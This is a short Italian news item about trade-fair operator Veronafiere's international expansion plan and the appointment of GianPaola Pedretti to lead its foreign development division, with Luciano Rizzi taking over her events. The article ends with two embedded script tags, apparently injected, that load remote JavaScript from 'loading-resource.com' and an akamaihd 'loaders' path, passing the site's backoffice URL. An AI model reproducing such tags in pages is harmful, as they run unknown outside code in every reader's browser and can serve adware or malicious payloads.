Il potenziamento delle attività internazionali attraverso una stabile presenza nei mercati esteri a maggior crescita è uno degli obiettivi prioritari del piano industriale di Veronafiere 2012 – 2016. Un concreto orientamento all'internazionalizzazione confermato dai recenti investimenti in acquisizioni di società e marchi fieristici all’estero in Brasile, India, Marocco.
Una decisa e strategica politica di espansione che ha determinato la nomina della dott.ssa GianPaola Pedretti, dal 2006 brand manager SAMOTER e delle manifestazioni del comparto edilizia e costruzioni, da oggi a capo della divisione dedicata allo sviluppo estero.
Sicuramente un ruolo impegnativo e di prestigio che va ad arricchire il curriculum di GianPaola Pedretti, già significativo e caratterizzato da un percorso di crescita professionale qualificato nel settore fieristico, che ha accolto con entusiasmo questa nuova sfida per il futuro, forte delle proprie competenze e abilità maturate nel tempo, riconosciute e apprezzate dai vertici di Veronafiere come dimostrato da questo nuovo incarico.
Le manifestazioni, tra cui le principali Samoter e Marmomacc, saranno affidate ora al collega Luciano Rizzi, Responsabile dell’Area Agriexpo e Technology.
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>